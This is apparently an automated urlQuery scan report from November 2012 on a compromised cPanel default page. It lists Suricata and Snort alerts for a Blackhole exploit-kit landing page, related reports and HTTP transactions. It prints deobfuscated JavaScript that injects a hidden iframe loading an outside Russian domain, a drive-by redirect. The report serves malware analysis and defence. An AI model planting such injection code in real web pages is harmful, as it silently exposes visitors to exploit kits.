Overview

URL: http://110.4.45.59/cgi-sys/defaultwebpage.cgi
IP: 110.4.45.59
ASN: AS46015 Exa Bytes Network Sdn.Bhd.
Location: Malaysia
Report completed: 2012-11-08 22:19:48 CET
urlQuery Alerts: Detected malicious iframe injection


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-08 22:19:15 | 110.4.45.59 | urlQuery Client | 2 | ET CURRENT_EVENTS Blackhole Try Prototype Catch June 11 2012

Snort /w Sourcefire VRT

Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-08 22:19:14 | 110.4.45.59 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-08 22:19:14 | 110.4.45.59 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-08 22:19:14 | 110.4.45.59 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 110.4.45.59

Date | Alerts / IDS | URL | IP
2013-02-09 05:28:31 | 1 / 1 | http://www.acgstore.com/us | 110.4.45.59
2013-02-05 14:04:40 | 1 / 0 | http://www.droool.net/view/26/macronimous-web-design-blog.php | 110.4.45.59
2013-02-02 10:12:35 | 2 / 3 | http://horngwellfood.com/ | 110.4.45.59
2013-01-28 20:01:58 | 2 / 2 | http://horngwellfood.com/ | 110.4.45.59
2013-01-25 02:00:20 | 1 / 5 | http://www.qimendunjia.com/main/ | 110.4.45.59
2013-01-24 23:16:45 | 1 / 5 | http://www.qimendunjia.com/main | 110.4.45.59

Last 6 reports on ASN: AS46015 Exa Bytes Network Sdn.Bhd.

Date | Alerts / IDS | URL | IP
2013-02-14 06:34:25 | 0 / 3 | http://abuanasmadani.com | 110.4.45.155
2013-02-13 04:48:18 | 0 / 0 | http://wefreeze.net/ | 110.4.45.236
2013-02-12 13:23:31 | 1 / 0 | http://www.vipfullhd.com/v1/?p=85 | 110.4.45.84
2013-02-12 11:33:14 | 0 / 0 | http://www.lima.com.my/ | 110.4.45.236
2013-02-12 06:11:00 | 1 / 0 | http://www.vipfullhd.com/v1?category_name=uncategorized | 110.4.45.84
2013-02-12 05:08:37 | 1 / 0 | http://www.vipfullhd.com/v1?page_id=145 | 110.4.45.84

Last 1 reports on domain: 110.4.45.59

Date | Alerts / IDS | URL | IP
2012-11-08 22:15:54 | 1 / 3 | http://110.4.45.59/ | 110.4.45.59



JavaScript

Executed Scripts (3)


Executed Evals (1)

#1 JavaScript::Eval (size: 551, repeated: 1) - Alert detect on script (Severity: 2)

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autolloans.ru/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autolloans.ru/');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Executed Writes (0)



HTTP Transactions (7)


#1 Request
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

#1 Response
HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 08 Nov 2012 21:19:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

#2 Request
GET /sys_cpanel/images/powered_by.gif HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi

#2 Response
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Thu, 08 Nov 2012 21:19:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT
Etag: "2bb0068-ac7-41e6786455c80"
Accept-Ranges: bytes
Content-Length: 2759
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

#3 Request
GET /sys_cpanel/images/bottombody.jpg HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi

#3 Response
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 21:19:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT
Etag: "2bb0066-195-41e6786455c80"
Accept-Ranges: bytes
Content-Length: 405
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

#4 Request
GET /sys_cpanel/images/apache_pb.gif HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi

#4 Response
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Thu, 08 Nov 2012 21:19:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 27 Sep 2006 04:04:50 GMT
Etag: "2bb0069-916-41e6786455c80"
Accept-Ranges: bytes
Content-Length: 2326
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

#5 Request
GET /favicon.ico HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

#5 Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Thu, 08 Nov 2012 21:19:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked

#6 Request
GET /favicon.ico HTTP/1.1
Host: 110.4.45.59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

#6 Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Thu, 08 Nov 2012 21:19:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked

#7 Request
GET / HTTP/1.1
Host: autolloans.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://110.4.45.59/cgi-sys/defaultwebpage.cgi